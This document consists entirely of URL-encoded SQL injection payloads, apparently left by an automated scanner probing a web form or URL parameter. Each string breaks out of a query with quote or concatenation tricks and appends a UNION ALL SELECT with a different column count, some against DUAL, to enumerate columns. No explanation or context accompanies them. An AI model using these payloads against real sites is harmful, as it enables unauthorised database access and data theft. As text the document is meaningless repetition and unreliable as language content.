-3833%27%20%7C%7C%20%28SELECT%205175%20FROM%20DUAL%20WHERE%209618%3D9618%20UNION%20ALL%20SELECT%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618%2C%209618--%20%20%29%20%7C%7C%20%27 -7800%27%20%7C%7C%20%28SELECT%204185%20FROM%20DUAL%20WHERE%201019%3D1019%20UNION%20ALL%20SELECT%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019--%20%20%29%20%7C%7C%20%27 -5833%27%20%7C%7C%20%28SELECT%208760%20FROM%20DUAL%20WHERE%207431%3D7431%20UNION%20ALL%20SELECT%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431%2C%207431--%20%20%29%20%7C%7C%20%27 -8166%27%20%7C%7C%20%28SELECT%207445%20FROM%20DUAL%20WHERE%207073%3D7073%20UNION%20ALL%20SELECT%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073%2C%207073--%20%20%29%20%7C%7C%20%27 -6393%27%20%7C%7C%20%28SELECT%208370%20WHERE%203056%3D3056%20UNION%20ALL%20SELECT%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056%2C%203056--%20%20%29%20%7C%7C%20%27 -9035%27%20%7C%7C%20%28SELECT%202380%20WHERE%206436%3D6436%20UNION%20ALL%20SELECT%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436%2C%206436--%20%20%29%20%7C%7C%20%27 -5597%27%20%7C%7C%20%28SELECT%202356%20WHERE%204400%3D4400%20UNION%20ALL%20SELECT%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400%2C%204400--%20%20%29%20%7C%7C%20%27 -7427%27%20%7C%7C%20%28SELECT%205995%20WHERE%203727%3D3727%20UNION%20ALL%20SELECT%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727%2C%203727--%20%20%29%20%7C%7C%20%27 -3393%27%20%7C%7C%20%28SELECT%203823%20WHERE%206656%3D6656%20UNION%20ALL%20SELECT%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656%2C%206656--%20%20%29%20%7C%7C%20%27 -9470%27%20%7C%7C%20%28SELECT%208216%20WHERE%201396%3D1396%20UNION%20ALL%20SELECT%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396%2C%201396--%20%20%29%20%7C%7C%20%27 -9755%27%20%7C%7C%20%28SELECT%202805%20WHERE%207311%3D7311%20UNION%20ALL%20SELECT%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311%2C%207311--%20%20%29%20%7C%7C%20%27 -9358%27%20%7C%7C%20%28SELECT%202779%20WHERE%204746%3D4746%20UNION%20ALL%20SELECT%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746%2C%204746--%20%20%29%20%7C%7C%20%27 -7653%27%20%7C%7C%20%28SELECT%201909%20WHERE%202710%3D2710%20UNION%20ALL%20SELECT%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710%2C%202710--%20%20%29%20%7C%7C%20%27 -7136%27%20%7C%7C%20%28SELECT%205773%20WHERE%204798%3D4798%20UNION%20ALL%20SELECT%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798%2C%204798--%20%20%29%20%7C%7C%20%27 -2866%20%2B%20%28SELECT%202457%20FROM%20DUAL%20WHERE%203838%3D3838%20UNION%20ALL%20SELECT%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838%2C%203838--%20%20%29 -2101%20%2B%20%28SELECT%209576%20FROM%20DUAL%20WHERE%205902%3D5902%20UNION%20ALL%20SELECT%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902%2C%205902--%20%20%29 -5049%20%2B%20%28SELECT%209755%20FROM%20DUAL%20WHERE%202564%3D2564%20UNION%20ALL%20SELECT%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564--%20%20%29 -8686%20%2B%20%28SELECT%204511%20FROM%20DUAL%20WHERE%201051%3D1051%20UNION%20ALL%20SELECT%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051--%20%20%29 -1445%20%2B%20%28SELECT%203986%20FROM%20DUAL%20WHERE%203583%3D3583%20UNION%20ALL%20SELECT%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583%2C%203583--%20%20%29 -8163%20%2B%20%28SELECT%202487%20FROM%20DUAL%20WHERE%207452%3D7452%20UNION%20ALL%20SELECT%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452--%20%20%29 -2084%20%2B%20%28SELECT%202368%20FROM%20DUAL%20WHERE%205051%3D5051%20UNION%20ALL%20SELECT%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051--%20%20%29 -4011%20%2B%20%28SELECT%204296%20FROM%20DUAL%20WHERE%202487%3D2487%20UNION%20ALL%20SELECT%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487%2C%202487--%20%20%29 -6398%20%2B%20%28SELECT%207266%20FROM%20DUAL%20WHERE%204744%3D4744%20UNION%20ALL%20SELECT%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744--%20%20%29 -7782%20%2B%20%28SELECT%205854%20FROM%20DUAL%20WHERE%205241%3D5241%20UNION%20ALL%20SELECT%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241%2C%205241--%20%20%29 -1765%20%2B%20%28SELECT%202168%20WHERE%206605%3D6605%20UNION%20ALL%20SELECT%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605--%20%20%29 -7281%20%2B%20%28SELECT%201870%20WHERE%203080%3D3080%20UNION%20ALL%20SELECT%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080%2C%203080--%20%20%29 -3219%20%2B%20%28SELECT%207819%20WHERE%206026%3D6026%20UNION%20ALL%20SELECT%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026--%20%20%29 -6797%20%2B%20%28SELECT%206648%20WHERE%209963%3D9963%20UNION%20ALL%20SELECT%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963--%20%20%29 -7135%20%2B%20%28SELECT%209224%20WHERE%206950%3D6950%20UNION%20ALL%20SELECT%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950%2C%206950--%20%20%29 -7509%20%2B%20%28SELECT%203746%20WHERE%203679%3D3679%20UNION%20ALL%20SELECT%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679%2C%203679--%20%20%29 -4901%20%2B%20%28SELECT%203348%20WHERE%202518%3D2518%20UNION%20ALL%20SELECT%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518--%20%20%29 -3629%20%2B%20%28SELECT%206734%20WHERE%204794%3D4794%20UNION%20ALL%20SELECT%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794--%20%20%29 -7015%20%2B%20%28SELECT%205160%20WHERE%209056%3D9056%20UNION%20ALL%20SELECT%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056%2C%209056--%20%20%29 -8858%20%2B%20%28SELECT%201121%20WHERE%203117%3D3117%20UNION%20ALL%20SELECT%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117%2C%203117--%20%20%29 -3671%27%20%2B%20%28SELECT%20%27bWBX%27%20FROM%20DUAL%20WHERE%209433%3D9433%20UNION%20ALL%20SELECT%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433--%20%20%29%20%2B%20%27 -2117%27%20%2B%20%28SELECT%20%27xFMH%27%20FROM%20DUAL%20WHERE%206128%3D6128%20UNION%20ALL%20SELECT%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128%2C%206128--%20%20%29%20%2B%20%27 -5595%27%20%2B%20%28SELECT%20%27KyZf%27%20FROM%20DUAL%20WHERE%204457%3D4457%20UNION%20ALL%20SELECT%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457%2C%204457--%20%20%29%20%2B%20%27 -3704%27%20%2B%20%28SELECT%20%27whUC%27%20FROM%20DUAL%20WHERE%203608%3D3608%20UNION%20ALL%20SELECT%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608%2C%203608--%20%20%29%20%2B%20%27 -1753%27%20%2B%20%28SELECT%20%27wxWk%27%20FROM%20DUAL%20WHERE%208968%3D8968%20UNION%20ALL%20SELECT%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968%2C%208968--%20%20%29%20%2B%20%27 -4598%27%20%2B%20%28SELECT%20%27JrHv%27%20FROM%20DUAL%20WHERE%209928%3D9928%20UNION%20ALL%20SELECT%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928%2C%209928--%20%20%29%20%2B%20%27 -6498%27%20%2B%20%28SELECT%20%27gVFA%27%20FROM%20DUAL%20WHERE%208295%3D8295%20UNION%20ALL%20SELECT%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295%2C%208295--%20%20%29%20%2B%20%27 -2595%27%20%2B%20%28SELECT%20%27Xeoq%27%20FROM%20DUAL%20WHERE%209195%3D9195%20UNION%20ALL%20SELECT%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195--%20%20%29%20%2B%20%27 -1281%27%20%2B%20%28SELECT%20%27beuM%27%20FROM%20DUAL%20WHERE%209201%3D9201%20UNION%20ALL%20SELECT%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201%2C%209201--%20%20%29%20%2B%20%27 -3450%27%20%2B%20%28SELECT%20%27CwbG%27%20FROM%20DUAL%20WHERE%207471%3D7471%20UNION%20ALL%20SELECT%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471%2C%207471--%20%20%29%20%2B%20%27 -6309%27%20%2B%20%28SELECT%20%27ElAE%27%20WHERE%205946%3D5946%20UNION%20ALL%20SELECT%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946%2C%205946--%20%20%29%20%2B%20%27 -9132%27%20%2B%20%28SELECT%20%27lfvv%27%20WHERE%207743%3D7743%20UNION%20ALL%20SELECT%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743--%20%20%29%20%2B%20%27 -2355%27%20%2B%20%28SELECT%20%27YavR%27%20WHERE%203615%3D3615%20UNION%20ALL%20SELECT%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615--%20%20%29%20%2B%20%27 -5239%27%20%2B%20%28SELECT%20%27AZPh%27%20WHERE%203191%3D3191%20UNION%20ALL%20SELECT%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191--%20%20%29%20%2B%20%27 -1387%27%20%2B%20%28SELECT%20%27ddqL%27%20WHERE%201096%3D1096%20UNION%20ALL%20SELECT%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096--%20%20%29%20%2B%20%27 -8299%27%20%2B%20%28SELECT%20%27BARD%27%20WHERE%204541%3D4541%20UNION%20ALL%20SELECT%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541%2C%204541--%20%20%29%20%2B%20%27 -4447%27%20%2B%20%28SELECT%20%27GVkC%27%20WHERE%203748%3D3748%20UNION%20ALL%20SELECT%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748%2C%203748--%20%20%29%20%2B%20%27 -6033%27%20%2B%20%28SELECT%20%27NfKK%27%20WHERE%201703%3D1703%20UNION%20ALL%20SELECT%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703--%20%20%29%20%2B%20%27 